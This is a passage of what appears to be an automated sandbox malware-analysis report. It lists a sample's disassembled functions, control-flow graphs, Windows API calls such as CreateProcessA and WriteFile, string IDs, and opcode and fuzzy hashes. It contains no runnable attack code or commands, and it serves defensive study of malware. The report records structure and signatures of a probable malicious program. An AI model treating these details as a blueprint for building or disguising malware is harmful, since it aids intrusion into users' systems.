                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                            • API String ID: 0-4100612575
                            • Opcode ID: 4473441953b5c17a158b2db18c899ccf595ed08f2904e5f7fce8c80e63574ce0
                            • Instruction ID: 9fe492040b5531bbe3e370b7eefeb8807d15cbd4179fa1c92e7e10989e68a97d
                            • Opcode Fuzzy Hash: 4473441953b5c17a158b2db18c899ccf595ed08f2904e5f7fce8c80e63574ce0
                            • Instruction Fuzzy Hash: 6A719EB0209345AFDB10DF18C480B9ABBF5FF8A708F508A2EF489D7651D771D9489B82
                            Function 6C08BCA0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                            • API String ID: 0-174837320
                            • Opcode ID: 308364bcea87bc15e86ea34cdbe21d4be8c4b775a30247d76fe8ba1d907717b8
                            • Instruction ID: dbd5749f7da0e7bd2b63b7a2c6341b70e46c12d27f963663047d580cebae3050
                            • Opcode Fuzzy Hash: 308364bcea87bc15e86ea34cdbe21d4be8c4b775a30247d76fe8ba1d907717b8
                            • Instruction Fuzzy Hash: 8042357460A3429FCB14DE28C49071EBBF1AF89318F248E6EE5A587B61D734E845CB53
                            Function 6BF34200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: e9025daec63e6ef48e3a35acd160ffa1ac139b834bbc3a2ad3ff3f94c48367b0
                            • Instruction ID: 088e16f6f18e5c916c68cea1d1df6641c86c8b8ad6448f6861c65dce8181aa00
                            • Opcode Fuzzy Hash: e9025daec63e6ef48e3a35acd160ffa1ac139b834bbc3a2ad3ff3f94c48367b0
                            • Instruction Fuzzy Hash: 9503C733644B018FC728CF28C8D0695B7E3EFD5324759CA6DC0AA4B6A6D778B54ACB50
                            Function 6C0B5560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7579 6c0b5560-6c0b55e7 CreateProcessA 7580 6c0b563a-6c0b5643 7579->7580 7581 6c0b5660-6c0b567b 7580->7581 7582 6c0b5645-6c0b564a 7580->7582 7581->7580 7583 6c0b564c-6c0b5651 7582->7583 7584 6c0b55f0-6c0b5632 WaitForSingleObject CloseHandle * 2 7582->7584 7583->7580 7585 6c0b5653-6c0b5688 7583->7585 7584->7580
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: c55cd2a0b56a57a7d21bea87bf175d3531012ee813ddf3fc24b0b3ca9d07c1b5
                            • Instruction ID: da992ff01eb48210798cbe821a45cc128c950bbc04e7efc5bf33fa1e10243d10
                            • Opcode Fuzzy Hash: c55cd2a0b56a57a7d21bea87bf175d3531012ee813ddf3fc24b0b3ca9d07c1b5
                            • Instruction Fuzzy Hash: C131E2B08093818FE740DF28D19876EBBF0AB9A318F409A1DF8D997250E7759588CF47
                            Function 6C0CC1CE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7587 6c0cc1ce-6c0cc1ea 7588 6c0cc3a9 7587->7588 7589 6c0cc1f0-6c0cc1f2 7587->7589 7590 6c0cc3ab-6c0cc3af 7588->7590 7591 6c0cc214-6c0cc235 7589->7591 7592 6c0cc1f4-6c0cc207 call 6c0bff4f call 6c0bff3c call 6c0c0690 7589->7592 7593 6c0cc23c-6c0cc242 7591->7593 7594 6c0cc237-6c0cc23a 7591->7594 7607 6c0cc20c-6c0cc20f 7592->7607 7593->7592 7596 6c0cc244-6c0cc249 7593->7596 7594->7593 7594->7596 7598 6c0cc25a-6c0cc26b call 6c0cc3b0 7596->7598 7599 6c0cc24b-6c0cc257 call 6c0cb1d9 7596->7599 7608 6c0cc2ac-6c0cc2be 7598->7608 7609 6c0cc26d-6c0cc26f 7598->7609 7599->7598 7607->7590 7610 6c0cc305-6c0cc327 WriteFile 7608->7610 7611 6c0cc2c0-6c0cc2c9 7608->7611 7612 6c0cc296-6c0cc2a2 call 6c0cc421 7609->7612 7613 6c0cc271-6c0cc279 7609->7613 7614 6c0cc329-6c0cc32f GetLastError 7610->7614 7615 6c0cc332 7610->7615 7617 6c0cc2cb-6c0cc2ce 7611->7617 7618 6c0cc2f5-6c0cc303 call 6c0cc833 7611->7618 7623 6c0cc2a7-6c0cc2aa 7612->7623 7619 6c0cc27f-6c0cc28c call 6c0cc7cb 7613->7619 7620 6c0cc33b-6c0cc33e 7613->7620 7614->7615 7624 6c0cc335-6c0cc33a 7615->7624 7626 6c0cc2e5-6c0cc2f3 call 6c0cc9f7 7617->7626 7627 6c0cc2d0-6c0cc2d3 7617->7627 7618->7623 7630 6c0cc28f-6c0cc291 7619->7630 7625 6c0cc341-6c0cc346 7620->7625 7623->7630 7624->7620 7631 6c0cc348-6c0cc34d 7625->7631 7632 6c0cc3a4-6c0cc3a7 7625->7632 7626->7623 7627->7625 7633 6c0cc2d5-6c0cc2e3 call 6c0cc90e 7627->7633 7630->7624 7635 6c0cc34f-6c0cc354 7631->7635 7636 6c0cc379-6c0cc385 7631->7636 7632->7590 7633->7623 7641 6c0cc36d-6c0cc374 call 6c0bff62 7635->7641 7642 6c0cc356-6c0cc368 call 6c0bff3c call 6c0bff4f 7635->7642 7639 6c0cc38c-6c0cc39f call 6c0bff3c call 6c0bff4f 7636->7639 7640 6c0cc387-6c0cc38a 7636->7640 7639->7607 7640->7588 7640->7639 7641->7607 7642->7607
                            APIs
                              • Part of subcall function 6C0CC421: GetConsoleCP.KERNEL32(?,6C0CB640,?), ref: 6C0CC469
                            • WriteFile.KERNEL32(?,?,6C0D4C5C,00000000,00000000,?,00000000,00000000,6C0D6026,00000000,00000000,?,00000000,6C0CB640,6C0D4C5C,00000000), ref: 6C0CC31F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000,?,?,?,?,00000000,?), ref: 6C0CC329
                            • __dosmaperr.LIBCMT ref: 6C0CC36E
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 3c499b7c5fac59fc2d60e57a6ff5eeec2959bc66fec5f09c0227b2405ab00260
                            • Instruction ID: 246ad75c95586969e65784092c865a594ed526555db6f48da61451a4974a21da
                            • Opcode Fuzzy Hash: 3c499b7c5fac59fc2d60e57a6ff5eeec2959bc66fec5f09c0227b2405ab00260
                            • Instruction Fuzzy Hash: 7851D171B0421AAFDB01EFE8C840BEEBBF8FF4A358F140155E510BBA50D731A9458762
                            Function 6C0B6100 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7654 6c0b6100-6c0b610c 7655 6c0b610e-6c0b6119 7654->7655 7656 6c0b614d 7654->7656 7657 6c0b611b-6c0b612d 7655->7657 7658 6c0b612f-6c0b613c call 6bf801f0 call 6c0c1088 7655->7658 7659 6c0b614f-6c0b61c7 7656->7659 7657->7658 7668 6c0b6141-6c0b614b 7658->7668 7661 6c0b61c9-6c0b61f1 7659->7661 7662 6c0b61f3-6c0b61f9 7659->7662 7661->7662 7663 6c0b61fa-6c0b62b9 call 6bf82250 call 6bf82340 call 6c0b98e9 call 6bf7e010 call 6c0b75f8 7661->7663 7668->7659
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B62A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: e5a501e2d125a383814efc229a8d33aaa36692e0b0f08a87eb0d057d95c231a7
                            • Instruction ID: 6bae69cdc6d75256cf0b73913da4c42ba9a748ccac1fb5d987f96d8673d7cf4d
                            • Opcode Fuzzy Hash: e5a501e2d125a383814efc229a8d33aaa36692e0b0f08a87eb0d057d95c231a7
                            • Instruction Fuzzy Hash: D75133B5900B008FD725CF29C895B96BBF1BB48318F448A2DD8865BB91D776B909CF90
                            Function 6C0CBE95 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7677 6c0cbe95-6c0cbea9 call 6c0d1b12 7680 6c0cbeaf-6c0cbeb7 7677->7680 7681 6c0cbeab-6c0cbead 7677->7681 7683 6c0cbeb9-6c0cbec0 7680->7683 7684 6c0cbec2-6c0cbec5 7680->7684 7682 6c0cbefd-6c0cbf1d call 6c0d1c8f 7681->7682 7694 6c0cbf1f-6c0cbf29 call 6c0bff62 7682->7694 7695 6c0cbf2b 7682->7695 7683->7684 7686 6c0cbecd-6c0cbee1 call 6c0d1b12 * 2 7683->7686 7687 6c0cbec7-6c0cbecb 7684->7687 7688 6c0cbee3-6c0cbef3 call 6c0d1b12 CloseHandle 7684->7688 7686->7681 7686->7688 7687->7686 7687->7688 7688->7681 7698 6c0cbef5-6c0cbefb GetLastError 7688->7698 7696 6c0cbf2d-6c0cbf30 7694->7696 7695->7696 7698->7682
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0D47CF), ref: 6C0CBEEB
                            • GetLastError.KERNEL32(?,00000000,?,6C0D47CF), ref: 6C0CBEF5
                            • __dosmaperr.LIBCMT ref: 6C0CBF20
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID: 8y
                            • API String ID: 2583163307-1876948340
                            • Opcode ID: 7fbf3bff8dce6334b762b6bc37b50d129bcb31768639aac63d10807168ea5afa
                            • Instruction ID: 595fc840f391d8269d41e225d418c97ea8fc8e5349d7b79f4f9e886fd4e7af6c
                            • Opcode Fuzzy Hash: 7fbf3bff8dce6334b762b6bc37b50d129bcb31768639aac63d10807168ea5afa
                            • Instruction Fuzzy Hash: 3101483370832026C20156B99454BAE2BED4F83F3CF3A4248EA1487BD1DF71E8849552
                            Function 6C0C110C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7944 6c0c110c-6c0c1117 7945 6c0c112e-6c0c113b 7944->7945 7946 6c0c1119-6c0c112c call 6c0bff3c call 6c0c0690 7944->7946 7948 6c0c113d-6c0c1152 call 6c0c1229 call 6c0c8cae call 6c0ca1d0 call 6c0cbe08 7945->7948 7949 6c0c1176-6c0c117f call 6c0cb3e5 7945->7949 7957 6c0c1180-6c0c1182 7946->7957 7963 6c0c1157-6c0c115c 7948->7963 7949->7957 7964 6c0c115e-6c0c1161 7963->7964 7965 6c0c1163-6c0c1167 7963->7965 7964->7949 7965->7949 7966 6c0c1169-6c0c1175 call 6c0c4d2b 7965->7966 7966->7949
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: da45be805bba3bd66bf0ede0be2ec413e0f7b3da4389a616bcca2ac6b1724a43
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 11F0A436B026146AD6222A79DC00BCE32E89F8277DF114715ED2493FD0DB79E40AD6E7
                            Function 6C0B5ED0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B6024
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B6064
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 9697bf3927e59a3da56662d2576502564797e9e80a9583bd4884fc49c2131858
                            • Instruction ID: 4f6a5117cc0d98c554d87fb86e8dd31f0ab1ea7d50861407b83ad4f2cd2792e7
                            • Opcode Fuzzy Hash: 9697bf3927e59a3da56662d2576502564797e9e80a9583bd4884fc49c2131858
                            • Instruction Fuzzy Hash: 38514775101B01DBE725CF24C885BD6BBF4FF04718F448A5DE4AA5B6A1DB31B548CB81
                            Function 6C0BF4AF Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(6C0E6DF0,0000000C), ref: 6C0BF4C2
                            • ExitThread.KERNEL32 ref: 6C0BF4C9
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: 692b939171038048a096bfe749aaf1c4c9531d925cc2dbaff111d116b2798132
                            • Instruction ID: af80a7190e5acce0cd0ef2f0cbb22e6e44665054195497df108d7f4125fbc52d
                            • Opcode Fuzzy Hash: 692b939171038048a096bfe749aaf1c4c9531d925cc2dbaff111d116b2798132
                            • Instruction Fuzzy Hash: 36F0AF75A40205AFDB149BB0C408BAE7BF8FF05718F244549F106A7B51CF356945CB61
                            Function 6C0CB4E2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 381bc10d80fb33c419758748fbe122c7d6d8a43501542678c3084df1b73b517d
                            • Instruction ID: 194c1a3315d7d3316f931ac908498eba642cc7f6cc9906ffa028984da16c118b
                            • Opcode Fuzzy Hash: 381bc10d80fb33c419758748fbe122c7d6d8a43501542678c3084df1b73b517d
                            • Instruction Fuzzy Hash: FA114871A0420AAFCF05DF59E940ADF7BF8EF48308F154069F809AB341D671E921CBA9
                            Function 6C0D456E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 5ac337abc7e5bc548734fbb2dcc3fad5f2b4866c0a9bd026fb4388956c1311d8
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: A2017C72C10259BFCF01AFE88C00AEE7FF5BF08214F104165EA24A22A1E7319A24DB81
                            Function 6C0D49C7 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6C0D4685,?,?,00000000,?,6C0D4685,00000000,0000000C), ref: 6C0D49E4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 6ac0aff718d129ef2607281cb0ad7c377c4712e5b4b2eb2ae92e8979ccb9a01e
                            • Instruction ID: 7daa1fe7d5d25797752cb3b83449080b2216b0994d2129429e0788578b2f1384
                            • Opcode Fuzzy Hash: 6ac0aff718d129ef2607281cb0ad7c377c4712e5b4b2eb2ae92e8979ccb9a01e
                            • Instruction Fuzzy Hash: EFD06C3214010DBBDF029E84DC06EDA3BAAFB4C714F024000BA1856020C732E861AB90
                            Function 6BF87CB0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: 143e81c569b273025fc9810a336c9c45e8ba07553bce963319e580c7da643a31
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:

                            Non-executed Functions

                            Function 6C0B1DF0 Relevance: 10.5, APIs: 3, Strings: 1, Instructions: 3538COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
